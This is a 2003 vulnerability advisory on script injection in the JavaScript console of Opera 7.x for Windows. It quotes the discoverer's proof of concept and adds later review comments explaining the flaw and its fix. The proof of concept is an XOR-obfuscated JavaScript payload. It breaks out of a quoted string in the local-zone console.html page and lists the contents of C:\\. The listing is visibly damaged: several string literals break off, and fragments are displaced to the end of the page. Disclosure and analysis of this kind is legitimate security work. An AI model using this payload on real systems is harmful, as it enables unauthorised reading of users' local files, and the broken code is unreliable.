Reported
April 28, 2003, by nesumin.
VERSIONS
AFFECTED
Opera for Windows 7.10
(build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b),
7.01 (build 2651)
DESCRIPTION
DEMONSTRATION
The
discoverer posted the following code as proof of concept:
==============
This code generates
a link on the JavaScript console
that reads the directory
listing of the local disk "C:\" and displays it.
\[1\] replace the
"script" instead of "Xploit" and save as html file
\[2\] upload to WEB
server
\[3\] open with
Opera(enable javascript)
\[4\] click a link on
the JavaScript console
----------------------------------------------------------------
// Proof-of-concept quoted in the advisory above (Opera for Windows 7.01-7.10,
// reported April 2003). Kept for the record; the annotations below are a
// defensive reading of the listing, not an endorsement of it.
//
// NOTE(review): this listing is damaged by extraction. Several string
// literals (the lines ending in `b='`, `"b+='`, `"for(i=1;i` and
// `"for (j=0;j`) break off where angle-bracketed markup inside the literal was
// dropped, and their tails appear displaced after the listing. As shown it is
// not parseable JavaScript.
//
// Vulnerability class, as the advisory states it: the message handed to
// opera.postError is reflected into console.html, a file:// (Local Computer
// zone) page, without the single quotation mark being escaped. A quote in the
// message therefore terminates a quoted JavaScript string in that page and the
// remainder of the message is evaluated with local-zone privileges. The
// vendor-side fix is contextual output encoding of the message before it is
// written into a script context; affected versions are listed at the top of
// the advisory.
var depth = 1;
var startdir = "file://localhost/c:/";
// arbitrary
script
var evil_script="";
evil_script +=
"function dt(dp)\{\n";
evil_script += "var
i,j,tr,td,b;\n";
evil_script += "if('complete'fr.document.readyState&&";
evil_script += "fr.document.getElementsByTagName('base').item(0))\{\n";
evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='
evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";
evil_script +=
"b+='
evil_script += "for(i=1;i
evil_script += "td
= tr.item(i).getElementsByTagName('td');\n";
evil_script += "if
(td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";
evil_script += "if(dp>0
&& td.item(0).getElementsByTagName('img')";
evil_script +=
".item(0).src.match(/\\\\folder\\.gif$/))\n";
evil_script +=
"ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";
evil_script +=
"for (j=0;j
evil_script +=
"b+='
evil_script += "if
(0>=ds.length)return;fr.location.href=ds.pop();--dp;\}\n";
evil_script += "setTimeout('dt('+dp+');',30);\}\nvar
ds = new Array(),";
evil_script += "b
= document.getElementsByTagName('body').item(0),";
evil_script += "f
= document.createElement('iframe'),";
evil_script += "d
= document.createElement('div');\n";
evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";
evil_script += "f.style.width=f.style.height=f.style.border=0;\n";
evil_script += "f.setAttribute('src','"+startdir+"');\n";
evil_script += "f.setAttribute('id','fr');\n";
evil_script += "b.appendChild(f);\n";
evil_script += "dt("+depth+");\n";
// xor and
URLEncode
evil_script =
escape(evil_script.replace(/./g,function(s)\{
return(String.fromCharCode(0x80^s.charCodeAt(0)))\}));
var msg = "http://";
// fake url
msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";
// code
msg +=
"');m='";
msg += evil_script;
msg += "';eval(unescape(m).replace(/./g,function(s)\{";
msg +=
"return(String.fromCharCode(0x80^s.charCodeAt(0)))\})+'\n";
// fake message
msg += "\n";
msg += "Fatal
Error !!!!\n\n";
msg += " Please
click above link.\n"; // :p
opera.postError(msg);
//window.open("file://localhost/console.html","","");
location.href = "file://localhost/console.html";
----------------------------------------------------------------
VENDOR
RESPONSE
CREDIT
A vulnerability in Opera for Windows can result in the execution of an arbitrary script in the Local Computer zone. This vulnerability is a result of code in Opera 7.x's console.html file that doesn't sanitize the single quotation mark. The flaw permits a malicious intruder to inject an arbitrary script into the link on the Microsoft JavaScript console.
\\n'";
\\n'+'Count : '+tr.length+'
\\n';\n";
\\n';\}tree.innerHTML+=b;\n";

Opera has yet to respond to this problem.
Discovered by
nesumin.
Script Injection Vulnerability in Opera for Windows JavaScript Console